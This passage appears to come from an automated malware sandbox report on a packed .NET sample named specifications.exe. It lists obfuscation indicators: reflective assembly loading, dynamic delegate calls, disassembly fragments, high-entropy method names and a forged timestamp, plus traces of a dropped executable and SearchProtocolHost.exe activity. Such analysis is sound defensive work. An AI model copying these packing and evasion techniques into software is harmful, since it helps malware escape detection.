                      Source: Binary string: SearchProtocolHost.pdb source: neghZqrDWkxUmu.exe, 00000006.00000003.1980326179.000000000127C000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.cs.Net Code: kfOcHLud8M System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.cs.Net Code: kfOcHLud8M System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.cs.Net Code: kfOcHLud8M System.Reflection.Assembly.Load(byte[])
                      Source: specifications.exeStatic PE information: 0x91062694 [Wed Feb 6 20:56:52 2047 UTC]
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_02FE0B2C push ebp; iretd 0_2_02FE0B30
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 0_2_0A0A3CE8 push esp; ret 0_2_0A0A3CF5
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00414B10 push edx; retf A241h2_2_00414B38
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00405057 push es; retf 2_2_00405075
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00416074 push eax; retf 2_2_0041609C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00412176 push edx; iretd 2_2_00412179
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0040AC7B push es; retf 2_2_0040AC88
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00403400 push eax; ret 2_2_00403402
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00411CE9 push esp; retf 2_2_00411C7E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_00415FBD pushad ; retf 2_2_00415FBE
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0105225F pushad ; ret 2_2_010527F9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010527FA pushad ; ret 2_2_010527F9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010809AD push ecx; mov dword ptr [esp], ecx2_2_010809B6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0105283D push eax; iretd 2_2_01052858
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01051368 push eax; iretd 2_2_01051369
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032DCB31 push edx; iretd 6_2_032DCB34
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032E0A2F push eax; retf 6_2_032E0A57
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032CFA12 push es; retf 6_2_032CFA30
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032E0978 pushad ; retf 6_2_032E0979
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D5636 push es; retf 6_2_032D5643
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032DC6A4 push esp; retf 6_2_032DC639
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032E340C push eax; retf 6_2_032E340D
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00AF225F pushad ; ret 7_2_00AF27F9
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00AF27FA pushad ; ret 7_2_00AF27F9
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00AF283D push eax; iretd 7_2_00AF2858
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B209AD push ecx; mov dword ptr [esp], ecx7_2_00B209B6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00AF1368 push eax; iretd 7_2_00AF1369
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011E52B push ebp; retf 7_2_0011E533
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011E8E6 push esp; retf 7_2_0011E87B
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0011ED73 push edx; iretd 7_2_0011ED76
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0012564E push eax; retf 7_2_0012564F
                      Source: specifications.exeStatic PE information: section name: .text entropy: 7.769913343213509
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, iRgP998qB2GsmTBLH3.csHigh entropy of concatenated method names: 'N9stnVDlPl', 'WgTtMoboeI', 'oQGtpbG2kw', 'xu7tkB2qSM', 'oitt4JEUNq', 'xn9tlwkjkR', 'DlFt5tn0UJ', 'UJAtADa24t', 'PyAthG5ktN', 'kVttmO7d5X'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, y6A21QbEFxvIWUuwrL.csHigh entropy of concatenated method names: 'y2JHFZHba', 'eFNyZJrgP', 'dsc74W7Lk', 'TQigftJ1j', 'tTjssW3qh', 'qsaoJLynO', 'cxKiXhnFTjqWMWm8OC', 'UZfrGebT26pWDikK6D', 'BvOCTOyF1', 'xEDT6kBGI'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, gFGbNltjbdVaU8BS5D.csHigh entropy of concatenated method names: 'Dispose', 'pKawhAOfDs', 'AOsbjRNEIg', 'NITZ7UMqtj', 'LnGwm2wQcw', 'jrcwzIX7IA', 'ProcessDialogKey', 'YNhbuYmax6', 'BFcbwwQEcX', 'ufAbbvjWp0'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, DDl9dcxhv3AAh46SIZ.csHigh entropy of concatenated method names: 'oGBQ8Cgwng', 'bJIQsCBnhk', 'LpoQZrmgbv', 'VLyQjFtjjj', 'RKTQrSAi7r', 'UnYQdY7dWe', 'DDjQF7ypQq', 'bavQGIqZZ1', 'uy4QX5U2i2', 'txAQanFrS1'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, eSmH0HcDtYZ5fiJt70.csHigh entropy of concatenated method names: 'cvSwDRgP99', 'hB2w0GsmTB', 'z2KwYPWV1i', 'ncywUluPrs', 'zofwNYLRaG', 'ytjwI70qKc', 'qKBF8FpiMysGGyxEDF', 'TXPDb5JcWG0UfeBlea', 'Dxxwwht4XV', 'I4BwKWdysx'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, kblALy0udoOuyRlAJl.csHigh entropy of concatenated method names: 'DoZKRU8IKb', 'QFVKJhPUbY', 'Pp2KtoKLO9', 'wDDKqTfSrC', 'XlSKSxPREY', 'QQWKOYlllZ', 'pFbKDPreBN', 'KCIK0UhbTJ', 'xyvKetnFDA', 'eYWKYkapiI'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, Rmc6xhwwIjDjg9KFG0X.csHigh entropy of concatenated method names: 'VJPTmX9Wrt', 'XxnTzmTwd0', 'YUyBuHYv2i', 'U9TBwwgUJT', 'sTPBbd5kHx', 'HitBKRUnWe', 'JUBBcHRAhN', 'GsjBRa9EEr', 'cvRBJ0bG52', 'zlHBtqP2Zq'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, j50RVPl8MsasdbY0PP.csHigh entropy of concatenated method names: 'k72WAcG0NK', 'qeVWmudJ1T', 'nUbCudRbtr', 'pXOCw3ofrn', 'te1WacU0mB', 'jBvW3aYBA7', 'suRWxuBRfD', 'IgPWnuFGu5', 'cHoWMZTAUt', 'AoXWp7XsnG'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, bCitdwFMDvJPt5kUjd.csHigh entropy of concatenated method names: 'CrtDJ0xNU8', 'gtlDqE8maL', 'YclDOZjgGm', 'spaOm7uYZO', 'fLMOzwNAEW', 'VZ0DuDfkuF', 'DnsDwFPEk9', 'IjrDb915Aa', 'E0dDKD0EGj', 'bKjDcEEHZq'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, hEbOTjwc2fShI3DgJow.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gQb2vkgA9h', 'mBW2TLWUEr', 'Uvh2BheCWO', 'mwS22nGSIL', 'QrE2L6ipaZ', 'CZe2EwXonZ', 'UZ226wA5ca'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, DhZ8DhqQoeq8awut9y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'aHmbhyZUTU', 'CeCbmZXkjK', 'VHjbzlEQaV', 'YvJKuyXUqK', 'SahKwsdCxa', 'hoLKbc8FhV', 'NFmKKt7oCn', 'IWVLGMIvZRIUZOXBIq8'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, rjWp0PmewB3m2r8xLL.csHigh entropy of concatenated method names: 'pqPTqFSan8', 'XDtTSr8DT5', 'kGmTOvMV6C', 'YiUTDAyE8E', 'TldTvPeZl9', 'WaxT0nHJYK', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, aPrsiGoq4PWFCHofYL.csHigh entropy of concatenated method names: 'xwXSffOgS4', 'zRoSgNrNJY', 'Ouuq93h63d', 'VslqrrJAle', 'C1uqdAGYGN', 'homqPFqyhQ', 'PaeqFtEUmD', 'B6sqGqL6ck', 'ah6qVnny65', 'M76qXArSUi'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, YYmax6h7FcwQEcXLfA.csHigh entropy of concatenated method names: 'uRTvZs02LR', 'p96vjulXk3', 'd3Cv94pH6u', 'DXXvr8tWSl', 'UsZvdjWvod', 'YsvvPPn0C0', 'RwQvFDr2a4', 'hhlvGJeINt', 'O07vV6Tsau', 'AlVvX7D7B8'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, HjNi5tn8MeHVFhhhYL.csHigh entropy of concatenated method names: 'p2nNXAZ97c', 'w2YN30AkBb', 'F82Nn35dXh', 'plNNMng2ku', 'XQVNjuMc8s', 'CRFN9Xwvvn', 'zL9NrolvPw', 'AdiNdl1Jdm', 'GWhNPFntWK', 'gHlNFS91K2'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, bR5ZsB5OxIKaAOfDsF.csHigh entropy of concatenated method names: 'yvUvNWPveD', 'J8LvWbHwic', 'XkKvv5eVgr', 'f7TvBMHSRx', 'HA3vLcBl2r', 'sDtv68ycU4', 'Dispose', 'WaQCJmZFNk', 'PGvCtb6bi1', 'BqQCqhwqYR'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, hQ8YnHs2KPWV1iQcyl.csHigh entropy of concatenated method names: 'REuqyHSnVl', 'Ffpq7sRrOY', 'b92q8h4K9k', 'WOoqst0lbN', 'yOpqNEOjti', 'glCqIISJ9v', 'MAyqWs8n9S', 'bgTqCTNXpM', 'esdqv7RMwT', 'f6mqTcNOOX'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, eaG1tjZ70qKcAZMcNI.csHigh entropy of concatenated method names: 'iE0ORld4Bf', 'TymOtEFA2t', 'jW2OSrByF8', 'lEMODPFHak', 'zusO0CfUrP', 'Lj2S4YZ3GU', 'aXtSlaOwUA', 'nI1S5itYxL', 'HBoSAHcScV', 'QuHShm5Feo'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, zWhdhdV0x5yn5otc4J.csHigh entropy of concatenated method names: 'KrlDiboUxE', 'DHLD1hB0Fa', 'xX7DHWLQcI', 'p1NDyJ107Z', 'wUNDfoBZbR', 'jQtD77dhYU', 'ShgDgNMl54', 'LWZD8a7yXO', 'N0DDsWh4s0', 'cqEDobkLBU'
                      Source: 0.2.specifications.exe.b9c0000.6.raw.unpack, CSgTqOzp7p85XO53B2.csHigh entropy of concatenated method names: 'tqnT7AHUir', 'JwiT8vEJU3', 'KeXTsE1h6p', 'eIHTZpi2FK', 'NLyTjJPGrY', 'yYiTrJ7Gfa', 'BZxTdTetuZ', 'TrUT68W8GE', 'mw9TigLSMw', 'Gm3T1sTuL1'
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.specifications.exe.49d24e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, iRgP998qB2GsmTBLH3.csHigh entropy of concatenated method names: 'N9stnVDlPl', 'WgTtMoboeI', 'oQGtpbG2kw', 'xu7tkB2qSM', 'oitt4JEUNq', 'xn9tlwkjkR', 'DlFt5tn0UJ', 'UJAtADa24t', 'PyAthG5ktN', 'kVttmO7d5X'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, y6A21QbEFxvIWUuwrL.csHigh entropy of concatenated method names: 'y2JHFZHba', 'eFNyZJrgP', 'dsc74W7Lk', 'TQigftJ1j', 'tTjssW3qh', 'qsaoJLynO', 'cxKiXhnFTjqWMWm8OC', 'UZfrGebT26pWDikK6D', 'BvOCTOyF1', 'xEDT6kBGI'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, gFGbNltjbdVaU8BS5D.csHigh entropy of concatenated method names: 'Dispose', 'pKawhAOfDs', 'AOsbjRNEIg', 'NITZ7UMqtj', 'LnGwm2wQcw', 'jrcwzIX7IA', 'ProcessDialogKey', 'YNhbuYmax6', 'BFcbwwQEcX', 'ufAbbvjWp0'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, DDl9dcxhv3AAh46SIZ.csHigh entropy of concatenated method names: 'oGBQ8Cgwng', 'bJIQsCBnhk', 'LpoQZrmgbv', 'VLyQjFtjjj', 'RKTQrSAi7r', 'UnYQdY7dWe', 'DDjQF7ypQq', 'bavQGIqZZ1', 'uy4QX5U2i2', 'txAQanFrS1'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, eSmH0HcDtYZ5fiJt70.csHigh entropy of concatenated method names: 'cvSwDRgP99', 'hB2w0GsmTB', 'z2KwYPWV1i', 'ncywUluPrs', 'zofwNYLRaG', 'ytjwI70qKc', 'qKBF8FpiMysGGyxEDF', 'TXPDb5JcWG0UfeBlea', 'Dxxwwht4XV', 'I4BwKWdysx'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, kblALy0udoOuyRlAJl.csHigh entropy of concatenated method names: 'DoZKRU8IKb', 'QFVKJhPUbY', 'Pp2KtoKLO9', 'wDDKqTfSrC', 'XlSKSxPREY', 'QQWKOYlllZ', 'pFbKDPreBN', 'KCIK0UhbTJ', 'xyvKetnFDA', 'eYWKYkapiI'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, Rmc6xhwwIjDjg9KFG0X.csHigh entropy of concatenated method names: 'VJPTmX9Wrt', 'XxnTzmTwd0', 'YUyBuHYv2i', 'U9TBwwgUJT', 'sTPBbd5kHx', 'HitBKRUnWe', 'JUBBcHRAhN', 'GsjBRa9EEr', 'cvRBJ0bG52', 'zlHBtqP2Zq'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, j50RVPl8MsasdbY0PP.csHigh entropy of concatenated method names: 'k72WAcG0NK', 'qeVWmudJ1T', 'nUbCudRbtr', 'pXOCw3ofrn', 'te1WacU0mB', 'jBvW3aYBA7', 'suRWxuBRfD', 'IgPWnuFGu5', 'cHoWMZTAUt', 'AoXWp7XsnG'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, bCitdwFMDvJPt5kUjd.csHigh entropy of concatenated method names: 'CrtDJ0xNU8', 'gtlDqE8maL', 'YclDOZjgGm', 'spaOm7uYZO', 'fLMOzwNAEW', 'VZ0DuDfkuF', 'DnsDwFPEk9', 'IjrDb915Aa', 'E0dDKD0EGj', 'bKjDcEEHZq'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, hEbOTjwc2fShI3DgJow.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gQb2vkgA9h', 'mBW2TLWUEr', 'Uvh2BheCWO', 'mwS22nGSIL', 'QrE2L6ipaZ', 'CZe2EwXonZ', 'UZ226wA5ca'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, DhZ8DhqQoeq8awut9y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'aHmbhyZUTU', 'CeCbmZXkjK', 'VHjbzlEQaV', 'YvJKuyXUqK', 'SahKwsdCxa', 'hoLKbc8FhV', 'NFmKKt7oCn', 'IWVLGMIvZRIUZOXBIq8'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, rjWp0PmewB3m2r8xLL.csHigh entropy of concatenated method names: 'pqPTqFSan8', 'XDtTSr8DT5', 'kGmTOvMV6C', 'YiUTDAyE8E', 'TldTvPeZl9', 'WaxT0nHJYK', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, aPrsiGoq4PWFCHofYL.csHigh entropy of concatenated method names: 'xwXSffOgS4', 'zRoSgNrNJY', 'Ouuq93h63d', 'VslqrrJAle', 'C1uqdAGYGN', 'homqPFqyhQ', 'PaeqFtEUmD', 'B6sqGqL6ck', 'ah6qVnny65', 'M76qXArSUi'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, YYmax6h7FcwQEcXLfA.csHigh entropy of concatenated method names: 'uRTvZs02LR', 'p96vjulXk3', 'd3Cv94pH6u', 'DXXvr8tWSl', 'UsZvdjWvod', 'YsvvPPn0C0', 'RwQvFDr2a4', 'hhlvGJeINt', 'O07vV6Tsau', 'AlVvX7D7B8'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, HjNi5tn8MeHVFhhhYL.csHigh entropy of concatenated method names: 'p2nNXAZ97c', 'w2YN30AkBb', 'F82Nn35dXh', 'plNNMng2ku', 'XQVNjuMc8s', 'CRFN9Xwvvn', 'zL9NrolvPw', 'AdiNdl1Jdm', 'GWhNPFntWK', 'gHlNFS91K2'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, bR5ZsB5OxIKaAOfDsF.csHigh entropy of concatenated method names: 'yvUvNWPveD', 'J8LvWbHwic', 'XkKvv5eVgr', 'f7TvBMHSRx', 'HA3vLcBl2r', 'sDtv68ycU4', 'Dispose', 'WaQCJmZFNk', 'PGvCtb6bi1', 'BqQCqhwqYR'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, hQ8YnHs2KPWV1iQcyl.csHigh entropy of concatenated method names: 'REuqyHSnVl', 'Ffpq7sRrOY', 'b92q8h4K9k', 'WOoqst0lbN', 'yOpqNEOjti', 'glCqIISJ9v', 'MAyqWs8n9S', 'bgTqCTNXpM', 'esdqv7RMwT', 'f6mqTcNOOX'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, eaG1tjZ70qKcAZMcNI.csHigh entropy of concatenated method names: 'iE0ORld4Bf', 'TymOtEFA2t', 'jW2OSrByF8', 'lEMODPFHak', 'zusO0CfUrP', 'Lj2S4YZ3GU', 'aXtSlaOwUA', 'nI1S5itYxL', 'HBoSAHcScV', 'QuHShm5Feo'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, zWhdhdV0x5yn5otc4J.csHigh entropy of concatenated method names: 'KrlDiboUxE', 'DHLD1hB0Fa', 'xX7DHWLQcI', 'p1NDyJ107Z', 'wUNDfoBZbR', 'jQtD77dhYU', 'ShgDgNMl54', 'LWZD8a7yXO', 'N0DDsWh4s0', 'cqEDobkLBU'
                      Source: 0.2.specifications.exe.4cbda88.3.raw.unpack, CSgTqOzp7p85XO53B2.csHigh entropy of concatenated method names: 'tqnT7AHUir', 'JwiT8vEJU3', 'KeXTsE1h6p', 'eIHTZpi2FK', 'NLyTjJPGrY', 'yYiTrJ7Gfa', 'BZxTdTetuZ', 'TrUT68W8GE', 'mw9TigLSMw', 'Gm3T1sTuL1'
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.specifications.exe.a050000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, iRgP998qB2GsmTBLH3.csHigh entropy of concatenated method names: 'N9stnVDlPl', 'WgTtMoboeI', 'oQGtpbG2kw', 'xu7tkB2qSM', 'oitt4JEUNq', 'xn9tlwkjkR', 'DlFt5tn0UJ', 'UJAtADa24t', 'PyAthG5ktN', 'kVttmO7d5X'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, y6A21QbEFxvIWUuwrL.csHigh entropy of concatenated method names: 'y2JHFZHba', 'eFNyZJrgP', 'dsc74W7Lk', 'TQigftJ1j', 'tTjssW3qh', 'qsaoJLynO', 'cxKiXhnFTjqWMWm8OC', 'UZfrGebT26pWDikK6D', 'BvOCTOyF1', 'xEDT6kBGI'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, gFGbNltjbdVaU8BS5D.csHigh entropy of concatenated method names: 'Dispose', 'pKawhAOfDs', 'AOsbjRNEIg', 'NITZ7UMqtj', 'LnGwm2wQcw', 'jrcwzIX7IA', 'ProcessDialogKey', 'YNhbuYmax6', 'BFcbwwQEcX', 'ufAbbvjWp0'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, DDl9dcxhv3AAh46SIZ.csHigh entropy of concatenated method names: 'oGBQ8Cgwng', 'bJIQsCBnhk', 'LpoQZrmgbv', 'VLyQjFtjjj', 'RKTQrSAi7r', 'UnYQdY7dWe', 'DDjQF7ypQq', 'bavQGIqZZ1', 'uy4QX5U2i2', 'txAQanFrS1'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, eSmH0HcDtYZ5fiJt70.csHigh entropy of concatenated method names: 'cvSwDRgP99', 'hB2w0GsmTB', 'z2KwYPWV1i', 'ncywUluPrs', 'zofwNYLRaG', 'ytjwI70qKc', 'qKBF8FpiMysGGyxEDF', 'TXPDb5JcWG0UfeBlea', 'Dxxwwht4XV', 'I4BwKWdysx'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, kblALy0udoOuyRlAJl.csHigh entropy of concatenated method names: 'DoZKRU8IKb', 'QFVKJhPUbY', 'Pp2KtoKLO9', 'wDDKqTfSrC', 'XlSKSxPREY', 'QQWKOYlllZ', 'pFbKDPreBN', 'KCIK0UhbTJ', 'xyvKetnFDA', 'eYWKYkapiI'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, Rmc6xhwwIjDjg9KFG0X.csHigh entropy of concatenated method names: 'VJPTmX9Wrt', 'XxnTzmTwd0', 'YUyBuHYv2i', 'U9TBwwgUJT', 'sTPBbd5kHx', 'HitBKRUnWe', 'JUBBcHRAhN', 'GsjBRa9EEr', 'cvRBJ0bG52', 'zlHBtqP2Zq'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, j50RVPl8MsasdbY0PP.csHigh entropy of concatenated method names: 'k72WAcG0NK', 'qeVWmudJ1T', 'nUbCudRbtr', 'pXOCw3ofrn', 'te1WacU0mB', 'jBvW3aYBA7', 'suRWxuBRfD', 'IgPWnuFGu5', 'cHoWMZTAUt', 'AoXWp7XsnG'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, bCitdwFMDvJPt5kUjd.csHigh entropy of concatenated method names: 'CrtDJ0xNU8', 'gtlDqE8maL', 'YclDOZjgGm', 'spaOm7uYZO', 'fLMOzwNAEW', 'VZ0DuDfkuF', 'DnsDwFPEk9', 'IjrDb915Aa', 'E0dDKD0EGj', 'bKjDcEEHZq'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, hEbOTjwc2fShI3DgJow.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gQb2vkgA9h', 'mBW2TLWUEr', 'Uvh2BheCWO', 'mwS22nGSIL', 'QrE2L6ipaZ', 'CZe2EwXonZ', 'UZ226wA5ca'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, DhZ8DhqQoeq8awut9y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'aHmbhyZUTU', 'CeCbmZXkjK', 'VHjbzlEQaV', 'YvJKuyXUqK', 'SahKwsdCxa', 'hoLKbc8FhV', 'NFmKKt7oCn', 'IWVLGMIvZRIUZOXBIq8'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, rjWp0PmewB3m2r8xLL.csHigh entropy of concatenated method names: 'pqPTqFSan8', 'XDtTSr8DT5', 'kGmTOvMV6C', 'YiUTDAyE8E', 'TldTvPeZl9', 'WaxT0nHJYK', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, aPrsiGoq4PWFCHofYL.csHigh entropy of concatenated method names: 'xwXSffOgS4', 'zRoSgNrNJY', 'Ouuq93h63d', 'VslqrrJAle', 'C1uqdAGYGN', 'homqPFqyhQ', 'PaeqFtEUmD', 'B6sqGqL6ck', 'ah6qVnny65', 'M76qXArSUi'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, YYmax6h7FcwQEcXLfA.csHigh entropy of concatenated method names: 'uRTvZs02LR', 'p96vjulXk3', 'd3Cv94pH6u', 'DXXvr8tWSl', 'UsZvdjWvod', 'YsvvPPn0C0', 'RwQvFDr2a4', 'hhlvGJeINt', 'O07vV6Tsau', 'AlVvX7D7B8'
                      Source: 0.2.specifications.exe.4c32a68.4.raw.unpack, HjNi5tn8MeHVFhhhYL.csHigh entropy of concatenated method names: 'p2nNXAZ97c', 'w2YN30AkBb', 'F82Nn35dXh', 'plNNMng2ku', 'XQVNjuMc8s', 'CRFN9Xwvvn', 'zL9NrolvPw', 'AdiNdl1Jdm', 'GWhNPFntWK', 'gHlNFS91K2'
